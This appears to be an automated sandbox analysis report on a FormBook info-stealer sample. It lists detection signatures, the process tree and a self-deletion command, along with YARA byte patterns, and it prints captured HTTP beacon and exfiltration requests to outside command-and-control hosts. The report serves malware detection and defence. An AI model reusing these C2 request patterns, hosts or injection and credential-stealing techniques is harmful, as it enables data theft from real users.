Loading ...

Play interactive tourEdit tour

Analysis Report M015Tob0Z8.exe

Overview

General Information

Sample Name:M015Tob0Z8.exe
Analysis ID:287789
MD5:d302a55d33c34c382c7518fdefd49efa
SHA1:0601338d74705de83a331a7a60b7e175bc931329
SHA256:34eeebc4197df0980b621253c336662f3868ccc65a5f99a832d47751d4d5384e
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected FormBook malware
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

Startup

  • System is w10x64
  • M015Tob0Z8.exe (PID: 7120 cmdline: 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: D302A55D33C34C382C7518FDEFD49EFA)
    • M015Tob0Z8.exe (PID: 7152 cmdline: 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: D302A55D33C34C382C7518FDEFD49EFA)
      • explorer.exe (PID: 3376 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 5480 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 5012 cmdline: /c del 'C:\Users\user\Desktop\M015Tob0Z8.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • 2d-hc6qljl.exe (PID: 580 cmdline: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe MD5: D302A55D33C34C382C7518FDEFD49EFA)
          • 2d-hc6qljl.exe (PID: 5264 cmdline: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exe MD5: D302A55D33C34C382C7518FDEFD49EFA)
        • cmd.exe (PID: 5504 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18339:$sqlite3step: 68 34 1C 7B E1
    • 0x1844c:$sqlite3step: 68 34 1C 7B E1
    • 0x18368:$sqlite3text: 68 38 2A 90 C5
    • 0x1848d:$sqlite3text: 68 38 2A 90 C5
    • 0x1837b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x184a3:$sqlite3blob: 68 53 D8 7F 8C
    0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 43 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      24.2.2d-hc6qljl.exe.2b80000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        24.2.2d-hc6qljl.exe.2b80000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a457:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b45a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        24.2.2d-hc6qljl.exe.2b80000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17539:$sqlite3step: 68 34 1C 7B E1
        • 0x1764c:$sqlite3step: 68 34 1C 7B E1
        • 0x17568:$sqlite3text: 68 38 2A 90 C5
        • 0x1768d:$sqlite3text: 68 38 2A 90 C5
        • 0x1757b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x176a3:$sqlite3blob: 68 53 D8 7F 8C
        24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b257:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c25a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 43 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: M015Tob0Z8.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeAvira: detection malicious, Label: TR/Kryptik.gyvjt
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeAvira: detection malicious, Label: TR/Kryptik.gyvjt
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeVirustotal: Detection: 76%Perma Link
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeReversingLabs: Detection: 83%
          Source: C:\Users\user\AppData\Local\Temp\Galrhv4ix\2d-hc6qljl.exeVirustotal: Detection: 76%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\Galrhv4ix\2d-hc6qljl.exeReversingLabs: Detection: 83%
          Multi AV Scanner detection for submitted fileShow sources
          Source: M015Tob0Z8.exeVirustotal: Detection: 76%Perma Link
          Source: M015Tob0Z8.exeReversingLabs: Detection: 83%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.482879406.0000000002C00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.446486312.0000000000790000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.262475630.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.263360451.0000000000D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.480975556.0000000000890000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.420809958.0000000002BC0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.445002981.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.444941297.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.420767972.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000001.419043407.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.218665040.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.444745055.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222201466.00000000041C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.261343360.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.483279481.0000000002F90000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.222170846.0000000004190000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2b80000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2bc0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.41c0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.41c0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.4190000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.M015Tob0Z8.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.M015Tob0Z8.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.1.2d-hc6qljl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.1.2d-hc6qljl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 24.2.2d-hc6qljl.exe.2b80000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.M015Tob0Z8.exe.4190000.2.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: M015Tob0Z8.exeJoe Sandbox ML: detected
          Source: 1.2.M015Tob0Z8.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.M015Tob0Z8.exe.41c0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 24.2.2d-hc6qljl.exe.2b80000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 24.2.2d-hc6qljl.exe.2bc0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.2.2d-hc6qljl.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.M015Tob0Z8.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 25.1.2d-hc6qljl.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.M015Tob0Z8.exe.4190000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\M015Tob0Z8.exeCode function: 0_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_00408D20
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeCode function: 24_2_00405BE0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,24_2_00405BE0
          Source: C:\Program Files (x86)\Galrhv4ix\2d-hc6qljl.exeCode function: 24_2_00408D20 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,24_2_00408D20
          Source: global trafficHTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=97HxSoDRqvNjqodSIW3EXGm+6HMYetQdLuCRAA5cNzNsRSMATlFDeDmb1zb9cgQrzPNe HTTP/1.1Host: www.andrew-vencetore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=UNJal7Hmn8/c6F+9a2RfkhdNz0trsYIy+PXlM39sodsvkAbf34VFCmjCjjxOfJ03KVSC HTTP/1.1Host: www.portalngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: LocawebServicosdeInternetSABR LocawebServicosdeInternetSABR
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.portalngs.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.portalngs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.portalngs.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 44 4b 38 4b 3d 63 76 46 67 37 63 79 51 6e 65 69 71 6c 30 6e 6f 50 47 52 43 37 68 39 43 30 32 42 44 73 72 51 6c 74 5f 57 2d 63 6c 4a 72 67 39 70 75 6b 44 62 30 32 64 67 32 52 42 76 47 77 78 35 51 43 64 77 62 52 56 69 4e 73 52 6a 45 4a 4d 6b 58 36 57 78 72 79 75 73 58 30 52 6a 52 61 4d 74 31 68 52 67 78 38 52 43 6f 77 78 28 32 36 6e 47 36 6b 50 38 6c 56 47 4f 6a 42 34 71 6a 4f 38 69 77 32 2d 67 61 69 70 38 62 4e 46 6d 61 4f 42 6c 38 44 32 67 32 6e 72 74 61 66 43 41 6d 76 36 49 34 49 71 34 62 56 6f 61 4d 59 63 46 4f 31 42 71 44 45 76 56 5a 67 76 50 64 39 7a 56 6c 59 37 66 34 6f 55 47 39 34 30 49 73 50 75 6f 53 7e 74 73 4f 71 59 6d 4a 75 4f 46 30 4f 64 53 59 4c 6e 6f 41 56 66 6b 54 6f 73 43 38 78 6e 72 47 6c 66 39 64 6e 49 4c 64 6b 56 70 35 4e 62 56 67 59 32 63 36 48 66 65 43 34 49 7a 48 54 69 75 32 78 50 38 38 69 67 56 55 55 31 66 51 30 46 47 32 28 31 59 69 4a 6b 43 5a 32 63 6d 6a 42 51 74 52 72 50 4d 34 30 49 7e 73 4a 52 5a 38 31 4b 31 79 32 36 64 38 79 41 5a 4d 68 72 62 65 6c 68 51 54 33 52 63 6a 6d 79 49 2d 4d 48 7a 31 78 53 28 56 73 39 6d 4c 59 70 66 30 4a 62 75 72 50 5f 6b 57 55 6d 33 6c 6b 55 51 67 6e 48 71 6a 51 36 28 58 78 76 79 76 55 69 7e 68 67 45 4d 63 6c 33 66 52 28 38 7a 42 52 39 6b 36 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vDK8K=cvFg7cyQneiql0noPGRC7h9C02BDsrQlt_W-clJrg9pukDb02dg2RBvGwx5QCdwbRViNsRjEJMkX6WxryusX0RjRaMt1hRgx8RCowx(26nG6kP8lVGOjB4qjO8iw2-gaip8bNFmaOBl8D2g2nrtafCAmv6I4Iq4bVoaMYcFO1BqDEvVZgvPd9zVlY7f4oUG940IsPuoS~tsOqYmJuOF0OdSYLnoAVfkTosC8xnrGlf9dnILdkVp5NbVgY2c6HfeC4IzHTiu2xP88igVUU1fQ0FG2(1YiJkCZ2cmjBQtRrPM40I~sJRZ81K1y26d8yAZMhrbelhQT3RcjmyI-MHz1xS(Vs9mLYpf0JburP_kWUm3lkUQgnHqjQ6(XxvyvUi~hgEMcl3fR(8zBR9k6sQ).
          Source: global trafficHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.portalngs.comConnection: closeContent-Length: 187951Cache-Control: no-cacheOrigin: http://www.portalngs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.portalngs.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 44 4b 38 4b 3d 63 76 46 67 37 64 37 72 6c 75 6e 30 75 6d 44 70 4e 57 68 5a 77 42 74 63 32 42 78 75 36 49 73 78 67 49 6e 6c 63 6b 35 76 37 50 51 78 31 7a 72 30 6e 6f 4d 39 4a 78 76 48 32 78 35 58 4a 39 30 4a 4f 53 28 42 73 55 43 4d 4a 4d 73 51 77 31 59 68 7a 2d 74 42 31 78 76 39 50 63 35 59 68 54 56 6a 28 33 6a 76 6d 68 7a 32 6e 42 75 34 72 4f 73 2d 46 53 65 57 49 6f 6d 6d 43 64 4b 54 32 70 51 75 77 62 41 70 4b 42 6d 55 4c 30 74 6e 4d 57 77 65 78 59 4e 76 43 6d 6f 39 67 62 51 76 47 72 31 53 57 73 33 5f 55 39 46 4e 70 46 47 46 50 4d 4e 72 6d 64 6a 4b 28 44 6c 62 59 34 28 4f 7a 33 53 57 79 58 4e 68 4e 37 41 6f 72 4d 6f 49 6c 4c 4f 52 71 4d 63 47 49 65 4b 6e 44 43 73 62 65 63 68 52 72 76 71 73 76 32 76 39 6a 75 42 72 7a 4e 33 68 6c 69 52 4c 53 4f 64 50 43 68 49 4c 49 62 75 30 35 36 28 62 5a 69 75 64 39 76 38 6f 73 77 56 73 43 32 79 53 30 31 61 4c 28 31 68 6a 63 45 75 61 37 36 6d 6a 4d 52 64 71 70 5f 38 30 36 63 36 55 65 42 74 4a 7a 4b 52 5f 37 61 63 76 79 46 31 4c 68 72 62 6f 6c 6c 45 35 30 46 55 6a 6d 6d 45 74 50 67 76 44 33 53 28 63 74 74 32 4a 58 35 69 35 4a 66 43 72 4f 4b 5a 35 56 52 54 6c 7a 58 59 68 6e 6d 71 6a 58 4b 28 58 74 76 7a 37 58 53 58 4c 73 30 6c 45 6b 55 66 57 30 4a 36 5f 54 73 52 4e 76 31 6b 4a 79 70 7e 50 62 71 71 67 42 76 4a 6d 30 33 39 71 68 66 48 6f 4e 62 42 6e 72 68 43 61 62 54 56 55 57 75 7a 77 4c 42 66 7a 37 6a 44 4f 51 76 28 58 39 74 75 6b 72 54 46 55 6d 44 6c 63 65 6c 64 51 6f 6a 58 63 70 64 4d 78 6f 4b 5a 71 6f 33 78 63 4e 49 53 62 75 41 62 4c 71 38 77 56 6d 6d 6f 51 70 39 73 39 7a 32 43 47 44 44 61 61 7a 42 55 2d 7e 6d 4b 4d 44 71 37 6b 78 37 64 66 30 70 73 4b 63 55 52 54 52 65 70 6e 49 32 35 33 57 2d 71 77 5a 59 75 36 66 37 73 65 47 4d 70 58 7a 4c 51 4a 68 70 36 42 31 31 4c 6c 7a 54 30 71 59 62 79 49 52 54 74 43 4d 59 76 78 46 6d 67 6d 4a 39 48 73 79 35 69 52 34 4a 5a 62 68 70 79 69 5a 39 65 71 66 74 44 4b 49 45 48 4f 41 6a 7e 6c 71 7a 43 7a 57 57 5a 73 51 38 43 33 48 74 38 42 36 37 4b 4a 57 33 6d 59 67 57 59 6c 31 34 4c 58 36 72 49 39 65 52 6f 63 77 43 43 55 63 4b 33 6e 74 4e 7e 63 74 6a 28 76 68 77 4f 63 77 64 39 36 33 34 4a 4d 72 32 68 70 59 33 71 47 42 4e 47 55 7a 35 61 65 78 41 28 62 4f 70 77 49 66 37 5a 6a 67 79 50 53 42 32 37 41 52 4b 38 5a 4b 76 6c 31 32 55 77 56 67 45 79 38 47 6d 67 31 34 48 77 30 54 4a 6f 54 73 62 78 6b 37 45 70 33 4e 63 76 42 63 78 67 2d 48 72 55 4b 6e 52 34 76 56 65 4e 71 4d 4a 77 52 34 6c 6d 6e 58 41 6a 6e 6e 72 39 66 6b 37 44 39 79 61 52 73 78 56 30 38 73 5f 32 4e 63 75 4a 61 6c 57 70 33 65 6e 39 6f 70 50 5a 74 76 42 70 2d 79 6d 64 4b 52 68 78 57 31 5f 64 54 76 6f 5a 73 67 48 52 50 37 47 70
          Source: C:\Windows\explorer.exeCode function: 2_2_04B9E722 getaddrinfo,setsockopt,recv,2_2_04B9E722
          Source: global trafficHTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=97HxSoDRqvNjqodSIW3EXGm+6HMYetQdLuCRAA5cNzNsRSMATlFDeDmb1zb9cgQrzPNe HTTP/1.1Host: www.andrew-vencetore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /3nk4/?0V0hlT=ghO43p2HD4iLw&vDK8K=UNJal7Hmn8/c6F+9a2RfkhdNz0trsYIy+PXlM39sodsvkAbf34VFCmjCjjxOfJ03KVSC HTTP/1.1Host: www.portalngs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.andrew-vencetore.com
          Source: unknownHTTP traffic detected: POST /3nk4/ HTTP/1.1Host: www.portalngs.comConnection: closeContent-Length: 411Cache-Control: no-cacheOrigin: http://www.portalngs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.portalngs.com/3nk4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 44 4b 38 4b 3d 63 76 46 67 37 63 79 51 6e 65 69 71 6c 30 6e 6f 50 47 52 43 37 68 39 43 30 32 42 44 73 72 51 6c 74 5f 57 2d 63 6c 4a 72 67 39 70 75 6b 44 62 30 32 64 67 32 52 42 76 47 77 78 35 51 43 64 77 62 52 56 69 4e 73 52 6a 45 4a 4d 6b 58 36 57 78 72 79 75 73 58 30 52 6a 52 61 4d 74 31 68 52 67 78 38 52 43 6f 77 78 28 32 36 6e 47 36 6b 50 38 6c 56 47 4f 6a 42 34 71 6a 4f 38 69 77 32 2d 67 61 69 70 38 62 4e 46 6d 61 4f 42 6c 38 44 32 67 32 6e 72 74 61 66 43 41 6d 76 36 49 34 49 71 34 62 56 6f 61 4d 59 63 46 4f 31 42 71 44 45 76 56 5a 67 76 50 64 39 7a 56 6c 59 37 66 34 6f 55 47 39 34 30 49 73 50 75 6f 53 7e 74 73 4f 71 59 6d 4a 75 4f 46 30 4f 64 53 59 4c 6e 6f 41 56 66 6b 54 6f 73 43 38 78 6e 72 47 6c 66 39 64 6e 49 4c 64 6b 56 70 35 4e 62 56 67 59 32 63 36 48 66 65 43 34 49 7a 48 54 69 75 32 78 50 38 38 69 67 56 55 55 31 66 51 30 46 47 32 28 31 59 69 4a 6b 43 5a 32 63 6d 6a 42 51 74 52 72 50 4d 34 30 49 7e 73 4a 52 5a 38 31 4b 31 79 32 36 64 38 79 41 5a 4d 68 72 62 65 6c 68 51 54 33 52 63 6a 6d 79 49 2d 4d 48 7a 31 78 53 28 56 73 39 6d 4c 59 70 66 30 4a 62 75 72 50 5f 6b 57 55 6d 33 6c 6b 55 51 67 6e 48 71 6a 51 36 28 58 78 76 79 76 55 69 7e 68 67 45 4d 63 6c 33 66 52 28 38 7a 42 52 39 6b 36 73 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vDK8K=cvFg7cyQneiql0noPGRC7h9C02BDsrQlt_W-clJrg9pukDb02dg2RBvGwx5QCdwbRViNsRjEJMkX6WxryusX0RjRaMt1hRgx8RCowx(26nG6kP8lVGOjB4qjO8iw2-gaip8bNFmaOBl8D2g2nrtafCAmv6I4Iq4bVoaMYcFO1BqDEvVZgvPd9zVlY7f4oUG940IsPuoS~tsOqYmJuOF0OdSYLnoAVfkTosC8xnrGlf9dnILdkVp5NbVgY2c6HfeC4IzHTiu2xP88igVUU1fQ0FG2(1YiJkCZ2cmjBQtRrPM40I~sJRZ81K1y26d8yAZMhrbelhQT3RcjmyI-MHz1xS(Vs9mLYpf0JburP_kWUm3lkUQgnHqjQ6(XxvyvUi~hgEMcl3fR(8zBR9k6sQ).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 20 Sep 2020 04:02:11 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1Content-Language: enData Raw: 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 0d 0a 61 66 0d 0a 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 